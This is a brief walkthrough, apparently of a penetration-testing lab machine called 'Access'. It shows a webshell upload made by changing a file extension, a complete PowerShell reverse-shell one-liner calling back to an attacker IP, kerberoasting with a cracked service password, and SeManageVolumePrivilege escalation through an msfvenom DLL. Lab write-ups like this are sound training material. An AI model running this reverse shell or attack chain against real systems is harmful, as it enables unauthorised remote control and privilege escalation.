Skip to content

Access 🔸

Enumeration

Web server shows a page about theevent

Initial Access

We can upload images so we can upload a webshell; change extension intercepting the request and change it from .png to .php...

File will be in /uploads (discovered with feroxbuster)

Now let's try to get a reverse shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.220',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Privilege Escalation

Transfer sharphound and get the zip. See the data in bloodhound.

user svc_mssql is kerberoastable.

We don't have svc_apache password so we have to execute the attack in the target. Transfer rubeus to there.

Using hashcat

We have svc_mssql:trustno1

To execute commands as this user we need runasc.

Using -Remote we can redirect the shell to a remote one.

This user has SeManageVolumePrivilege

Using https://github.com/CsEnox/SeManageVolumeExploit

Download and transfer the exe

Now, following the readme, generate a malicious dll with msfvenom and trasnfer it to C:\windows\system32\spool\drivers\x64\3\PrintConfig.dll

Start a listener and trigger it

Post Exploitation